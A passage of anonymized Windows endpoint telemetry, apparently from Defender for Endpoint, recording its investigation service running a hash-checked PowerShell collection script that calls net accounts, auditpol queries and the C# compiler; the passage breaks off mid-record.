01:15:33.907438900+00:00,d86dc5a3-68e6-4d75-a9a0-31f1a5478ae1,computerpii_0a470890c60768167990033d701e7bd881398861,156720,False,10.7740.19041.1052,False,11540474045172156,,11540474045172167,2021-06-23 01:13:47.559946800+00:00,8684,2021-06-23 01:13:47.559946800+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,8684,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+424,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:52.288904200+00:00,6500,net.exe,"""net.exe"" accounts",PortableExecutable,2019-12-07 09:09:33.990210300+00:00,C:\Windows\System32\net.exe,59904,0bd94a338eea5a4e1f2830ae326e6d19,9f376759bcbcd705f726460fc4a7e2b07f310f52baa73caaaaa124fddbdf993e,88b101598cc6726b7a57d02b1fa95be1b272a821,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:47.559938600+00:00,17592,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '900f80d1797f704215f1b63ee986972240e47cc081428073b4e11a2046d0cd7d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:52.357776400+00:00,2021-06-23 01:15:33.907719800+00:00,f175c084-9dfd-485e-b451-731318f09433,computerpii_0a470890c60768167990033d701e7bd881398861,156728,False,10.7740.19041.1052,False,11540474045172155,,11540474045172170,2021-06-23 01:13:47.559938600+00:00,17592,2021-06-23 01:13:47.559938600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,17592,18560,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,net.exe,net.exe,Net Command
+425,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:52.460149100+00:00,12396,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FilePII_581d8fda995b52fc75828fceeb50c299f8010356.tmp"" ""c:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\FilePII_8878fcedd01458e4c5958617281e5b5008892108.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 01:13:51.968475900+00:00,19252,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\ixphds5k.cmdline""",True,2021-06-23 01:13:47.559915900+00:00,12400,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:52.486735400+00:00,2021-06-23 01:15:33.908011900+00:00,5ccd2e60-95ae-4af4-845a-8edeb10ca2be,computerpii_0a470890c60768167990033d701e7bd881398861,156735,False,10.7740.19041.1052,False,11540474045172168,,11540474045172174,2021-06-23 01:13:51.968475900+00:00,19252,2021-06-23 01:13:51.968475900+00:00,csc.exe,19252,18688,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-23 01:13:51.205808900+00:00,2019-12-07 09:10:35.992536100+00:00,2176,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,0.0,257.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+426,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:52.461326100+00:00,8708,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FilePII_5f26bd129dec4e69539bbce17e7764e579f1a27f.tmp"" ""c:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\FilePII_1271758e122e1684f1ca2109c8c095aa89cdfa2f.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 01:13:51.963245800+00:00,10208,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\ed0rqzvo.cmdline""",True,2021-06-23 01:13:47.559946800+00:00,8684,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:52.486909800+00:00,2021-06-23 01:15:33.908046100+00:00,4efe6d27-d1c5-4164-b898-3320f0a8b3db,computerpii_0a470890c60768167990033d701e7bd881398861,156736,False,10.7740.19041.1052,False,11540474045172167,,11540474045172175,2021-06-23 01:13:51.963245800+00:00,10208,2021-06-23 01:13:51.963245800+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,10208,18560,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-23 01:13:51.205808900+00:00,2019-12-07 09:10:35.992536100+00:00,2176,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,0.0,257.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+427,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:53.909399600+00:00,11112,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce923f-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:47.559938600+00:00,17592,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '900f80d1797f704215f1b63ee986972240e47cc081428073b4e11a2046d0cd7d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:53.956815200+00:00,2021-06-23 01:15:33.910459300+00:00,d9874e9c-98fb-4f77-9bd1-cb88d6321f9b,computerpii_0a470890c60768167990033d701e7bd881398861,156806,False,10.7740.19041.1052,False,11540474045172155,,11540474045172191,2021-06-23 01:13:47.559938600+00:00,17592,2021-06-23 01:13:47.559938600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,17592,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+428,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:53.942650700+00:00,17620,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9239-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:47.559938600+00:00,17592,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '900f80d1797f704215f1b63ee986972240e47cc081428073b4e11a2046d0cd7d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:53.959194300+00:00,2021-06-23 01:15:33.910492800+00:00,3180cbed-7af0-4a3b-97bd-e0f7eceec693,computerpii_0a470890c60768167990033d701e7bd881398861,156807,False,10.7740.19041.1052,False,11540474045172155,,11540474045172192,2021-06-23 01:13:47.559938600+00:00,17592,2021-06-23 01:13:47.559938600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,17592,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+429,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:53.957729100+00:00,4336,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9237-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:47.559938600+00:00,17592,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '900f80d1797f704215f1b63ee986972240e47cc081428073b4e11a2046d0cd7d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:53.989340900+00:00,2021-06-23 01:15:33.910526500+00:00,584fdc0f-ed37-4d1c-b0ff-37c6512119a3,computerpii_0a470890c60768167990033d701e7bd881398861,156808,False,10.7740.19041.1052,False,11540474045172155,,11540474045172193,2021-06-23 01:13:47.559938600+00:00,17592,2021-06-23 01:13:47.559938600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,17592,18560,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+430,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:53.975720100+00:00,13692,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9235-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:47.559938600+00:00,17592,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '900f80d1797f704215f1b63ee986972240e47cc081428073b4e11a2046d0cd7d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:53.990491500+00:00,2021-06-23 01:15:33.910561400+00:00,82f51e30-4af4-4276-9875-2aebe0941686,computerpii_0a470890c60768167990033d701e7bd881398861,156809,False,10.7740.19041.1052,False,11540474045172155,,11540474045172194,2021-06-23 01:13:47.559938600+00:00,17592,2021-06-23 01:13:47.559938600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,17592,18560,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+431,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:53.993161400+00:00,10340,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9248-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:47.559938600+00:00,17592,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '900f80d1797f704215f1b63ee986972240e47cc081428073b4e11a2046d0cd7d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:54.012729300+00:00,2021-06-23 01:15:33.910594800+00:00,33d359e3-afa2-4272-925c-0e5e1a1562a8,computerpii_0a470890c60768167990033d701e7bd881398861,156810,False,10.7740.19041.1052,False,11540474045172155,,11540474045172195,2021-06-23 01:13:47.559938600+00:00,17592,2021-06-23 01:13:47.559938600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,17592,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+432,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:54.008827500+00:00,19384,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce922b-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:47.559938600+00:00,17592,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '900f80d1797f704215f1b63ee986972240e47cc081428073b4e11a2046d0cd7d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:54.014233400+00:00,2021-06-23 01:15:33.910627900+00:00,c3458681-e8d9-4707-ad04-bffde3a7b1c0,computerpii_0a470890c60768167990033d701e7bd881398861,156811,False,10.7740.19041.1052,False,11540474045172155,,11540474045172196,2021-06-23 01:13:47.559938600+00:00,17592,2021-06-23 01:13:47.559938600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,17592,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 